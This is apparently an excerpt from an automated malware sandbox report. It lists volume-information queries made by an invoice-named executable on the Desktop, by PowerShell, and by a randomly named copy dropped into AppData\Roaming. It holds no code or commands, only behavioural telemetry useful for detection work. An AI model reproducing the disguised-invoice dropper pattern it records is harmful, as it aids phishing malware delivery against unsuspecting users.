                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Users\user\AppData\Roaming\txQleCu.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Users\user\Desktop\INVOICE_NO._29998172.exe VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
